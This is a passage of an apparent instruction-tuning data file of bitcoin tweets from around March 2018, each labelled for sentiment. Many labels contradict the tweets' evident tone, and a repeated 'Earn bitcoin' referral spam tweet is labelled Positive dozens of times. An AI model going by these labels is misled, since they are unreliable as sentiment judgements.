@Bitcoin I\u2019m trying to find out about Bitcoin. Can you offer information", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.451,410\n1 Hour: - | 24 Hours: -6.58 % | 7 Days: 2.98 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8436.79 / 6847.72\u20ac\n1 bitcoin-cash = $970.839 / 787.981\u20ac\n1 ethereum = $516.277 / 419.036\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham What if #bitcoin is #fightclub and #Satoshi is tyler durden and craig is Edward Norton", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Great project, impressive level! \n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (the champcoin) is best crypto currency i love #tcc #bitcoin #BTC #xrp", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.63%, ($-5757.95) [Currently $8412.055] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8420.94", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@emiliakraft My last sugar baby invested my sugar into bitcoin lmao", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@stephanlivera @pierre_rochard Unix Philosophy is timeless. Bitcoin and *nix are like milk and cookies.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"You have to be willing to accept some risk in your Bitcoin transactions in order to scale it globally.\" - @VinnyLingham @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JohnLoveTheKing Facts and bitcoin LoL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 15 satoshi from WeLoveBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zerohedge China bitcoin and pedophilia seem to be competing for first to kill the dollar.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto in deleted video you say \"always assume parallel with bitcoin\" why and what's the significance?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@twobitidiot I like the idea, but what country uses Bitcoin as a reserve currency?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9423.79 --- Includes Sum of Forks, Core $8399.00 (89.13%) + Cash $967.36 (10.27%) + Gold $57.43 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core is starting to look somewhat like a pyramid scheme.\" - @ryanxcharles", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8436.79.\nThe current price of BCash is $970.839, or 0.115725 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RealMattCouch Do you accept bitcoin...serious question", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Whoever invests heavy this year in crypto( into the right coins) is going to be rich as fuck next year. #crypto #bitcoin #zec #bat $xmr $ltc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SKYFchain \nRegister now before its too late, avail the 30% off\n#skyfchain #Crowdsale #Bitcoin #Blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@vianry Bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Good currency ditcoin Bitcoin is 1 year $1,000 crores now live rate $3 invest now ditcoin better future", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@USATODAY Fortunately we\u2019ve got Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$970,839\n1 Hour: -0.34 % | 24 Hours: -7.55 % | 7 Days: 5.32 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"You can't steal the Bitcoin brand. It's a permissionless world.\" @VinnyLingham", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Coinbase Is In Talks to Buy One of Bitcoin's Best Funded Startups - CoinDesk -", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is dead, crypto tweeter are fake and you are all going to be rekt. Enjoy !", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #VisionOfSatoshi conference \u201cwhile I don\u2019t know what the right block size is, capping it @ 1mb is silly\u201d @VinnyLingham", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Good luck \ud83d\udc4d.\nLot of investesrs are thinking Bit will go to 2000$ for sure end of December .can any one can advise the thoughts ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "mEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "At @BrisbaneAirport - no one accepts Bitcoin. #FakeNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8435.82 / 6846.933\u20ac\n1 bitcoin-cash = $971.063 / 788.163\u20ac\n1 ethereum = $516.793 / 419.455\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8435.82 1.00000BTC \n1h: -0.44% \ud83d\udd3b \n1d: -6.73% \ud83d\udd3b \n7d: +2.83% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,511,710,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BB-8 is a bitcoin farmer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "M0mchil's external bitcoin miner idea has solved a lot of housekeeping data required. It will keep nagging the CPU!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "any1 knows anything about bitcoin?,i receive emails from them daily asking me 2 join", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@d_crypto0 @Yorkyor30444439 @TheCryptoDog I mean... 6 million bitcoin... lmao don\u2019t worry I know that\u2019s fake af", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If you let me order coffee after dinner you\u2019re fired. \n\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc ( the champ coin) time ka bitcoin hoga", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#cryptocurrencies #crypto #bitcoin No trades today just HODL for Correction", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current value of BTC at 15:24:07 on 23/03/2018 (AEST) is $10,870.00 AUD.\n#bitcoin #australia", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SanjayP33580371 I support bitcoin and regulate it.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nikzh @vermorel The one who bet against technology usually is a loser. :)\n\n#bitcoicash is #bitcoin and will scale to the world", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lol just got offered a scam job from a \u201cbitcoin\u201d company. Come on lads try harder", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 06:25:21 2018 (28:56)\nUSD : 8379.34\nWght: 0.42\nBlk#: 514765\nSize: 1090.2 KB\nTXs: 2420\nPool: 330 (0.5 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u201cThere is a lot of headroom to go!\u201d -@VinnyLingham on Bitcoin Cash. \u201cWill get a lot of traction in the payment space.\u201d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My PayPal and my bitcoin wallet are both jumpin like Jordan let\u2019s keep this shit stackin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Our #bitcoin atm at #Chinatown is now back online. Do drop by and feel free to come in to say hi. #bitcoinsingapore", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@liluzifresh26 Sure they can, for example, I am Positive Bitcoin will end it's Negative spiral downwards.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptopia_NZ @ColossusCoinXT Please add Bitcoin Privat...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000038933efa99946d8e7e25e8c5340a25782d0e3663232353 mined at height 514765.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "paperapapera1973@gmail.com Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1e1015d2f6bd97e430f5a44e44d315f895ff06e1844ed426707a7c36a082be94/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 20 satoshi from GalaxyBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 10 satoshi from PlayBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Unbanked around the world\u200a\u2014\u200a#UnbankedX system will help them all effortlessly #ICO #DOCHECKITOUT #BITCOIN #BLOCKCHAIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance Please add Bitcoin Privat...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Tomorrow would be a great day for Bitcoin to tank.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin price failed to break past the $9,000 level after news of a potential shutdown of #Binance in Japan broke out.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@brs_ogz Buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8423.74\nEthereum:$516.024\nBitcoin Cash:$969.07\nLitecoin:$158.534\nRipple:$0.632696\nIOTA:$1.27537", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8422.59 / 6836.195\u20ac\n1 bitcoin-cash = $969.07 / 786.545\u20ac\n1 ethereum = $515.719 / 418.583\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8381.97@bitstamp. High $9046.180. Low $8342.000. Market Cap $141.942 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Eventually, banks will welcome Bitcoin, just like telcos found a way to make a dime on the Internet.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002252 (-0.00000020) #BTC / 0.189038 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077749 (-0.00000575) #BTC / 6.52578 (-0.07241) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004583 (-0.00000014) #BTC / 0.384062 (-0.00196) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003290 (-0.00000016) #BTC / 0.275727 (-0.00183) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474443 (-0.00018450) #BTC / 397.633 (-2.29000) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance CZ can you please add BItcoin Private. It adds exatly THE feutures that are missing in Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8422.59 as of Fri Mar 23 00:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Very very exclusive currency the ditcoin future Bitcoin very soon now buy ditcoin $3", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8396.8", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"The idea that Bitcoin Cash doesn't have competent developers is a BS narrative.\" - @VinnyLingham at @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CrypConsigliere So non-volatile but will outperform Bitcoin, where will the returns come from if there's no risk?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CollectiveEvol Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ",Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jakeseelye @Socal_crypto It's about that time. Time to decide whether to place that 3rd bid or sleep on it. Just another day in bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lucx946 @Castle_CSTL @bitcoinprivate There is CSTL in Bitcoin private logo. And then there are Castle like design on the btcp logo.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thanks @ryanxcharles & @VinnyLingham for your insights on both sides of the #Bitcoin debate @Satoshis_Vision \ud83c\udf0f\u270c\ufe0f\ud83e\udd19", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay THE CHAMPCOIN HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Free_Ross And the beginning stages of their plan to defeat bitcoin!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Assuming Bitcoin needs use cases to become ' a thing' is silly. It just needs enough rich people and banks to think it's good for them.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptostardust @afrobeng is bitcoin an ERC20 token sir? \ud83d\ude02 \ud83d\ude02 \ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nSomeone may do it, so please send it\u3000\n#Bitcoin #VirtualCurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8421.7 / 6835.472\u20ac\n1 bitcoin-cash = $969.943 / 787.254\u20ac\n1 ethereum = $515.703 / 418.57\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "EWangBiCoin ( $EWC ) will be listed on CoinExchange #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Lost coins only make everyone else's coins worth slightly more. Think of it as a donation to everyone.\" - Satoshi Nakamoto #bitcoin #quote", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@creepy_von_evil ...I take payment in cash or bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin good\n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "We need Bitcoin to stay over $8300. Im already starting to see the vacuum on alts that have risen over this last week.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zmanbrianzane You're investing in Bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So fucking sick of this market.\n\n#cryptocurrency #crypto #BTC #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@youre_the_goat I\u2019d have pulled out of bitcoin earlier", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FlyGuyInTheSky Bitcoin Stinks", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC is Next BITCOIN of India.... The Champcoin is best cryptocruncy", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "0,00001293 Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AandGShow PLEASE!!! Can we just talk about bitcoin or something...pleeeaaassse?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8389 / \u20ac6801 / \u00a35943 @ Block 514765. \nMarket Cap: 143.22B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pierre_rochard what can you buy with bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Rick Falkvinge is the man. Watched him on YouTube, next day bought Bitcoin Cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-STEEM AskRate: 0.00024274 #Bittrex #STEEM $STEEM #STEEM #altcoin #altcoins #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.42 / 6850.666\u20ac\n1 bitcoin-cash = $970.377 / 787.606\u20ac\n1 ethereum = $518.991 / 421.239\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lottery in Bitcoin! ?\nPrize money and can be purchased from all over the world in the Bitcoin that can be received in any country ! !\nbitcoi", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8398.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sprenten @jucoplayerinfo Oh hi. Ok. Ill send you bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN FACTS: On the first 5 years of #Bitcoin existence, it grew from $0 to $1,000", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CarpeNoctom and I dont even know if that guy knows what bitcoin is", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin could entirely change the way our means of exchange works #bitcoinsfuture #bitcoin #btc #bitcoinsfuture", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc is the king of cryptocurrency..... And next Bitcoin from India", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@IAndrewIvers Don\u2019t buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 \ud83d\udc4f\ud83d\udc4f\nBitcoin is proof of that statement...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet\n3. use ABI648 as ref", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptomanran Agreed, there are plenty of other exchanges Japanese can buy bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko So... what say you , Buy Bitcoin now or wait a little longer?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How/when/where to invest in bitcoin and altcoins.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i think bitcoin ... may be significant perversely precisely because it takes a lot of time to mine, or to make headway ...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27834.002486 | LITECOIN(MCDTBC) R$574.99000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Vrmed @vr1med creating the future of vision equipment, top-tier VR headset. #ICO #crowdsale #bitcoin #ethereum #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If you would like to donate BitCoin towards the cost of my hosting send to: -> 1KBw1KzVDkqkipaDMVAxfMa5gzzwGzUXuH | #SupportAI #Anonymous", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What do you think will be the next big success like bitcoin? #cryptocurrency #ico", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8401.86 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,443.26, market cap of $142,982,909,952 (44.35%), and 24 hr vol. of $5,521,670,000 (37.67%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,443.26\nChange in 1h: -0.07%\nMarket cap: $142,982,909,952.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8437.14\nEthereum:$518.863\nBitcoin Cash:$971.23\nLitecoin:$158.259\nRipple:$0.634721\nIOTA:$1.27298", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,401.86, EUR 6,812.67", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.32% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8437.14 / 6848.004\u20ac\n1 bitcoin-cash = $970.355 / 787.588\u20ac\n1 ethereum = $518.863 / 421.135\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "23Mar2018 06:00 UTC #Bitcoin #Blockchain status - Last 24h: 135 blocks mined - 1,036,281 BTC output - 182,105 transactions", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Keep centered on the story which will become Bitcoin's destiny: It is not just a money, it is an innovation, a protocol, a technology.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 11:00PM #Bitcoin Price:\nUSD 8643.95 | EUR 7021.63 | JPY 918005.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jolb_ Top 10 Emotions The Biggest Bitcoin Miners Doesn\u2019t Want You To Know About", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8413.78/$8417.76 #Bitstamp\n$8408.90/$8411.29 #Kraken\n\u21e2$-8.86/$-2.49\n$8365.08/$8449.17 #Coinbase\n\u21e2$-52.68/$35.39", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc is next bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow 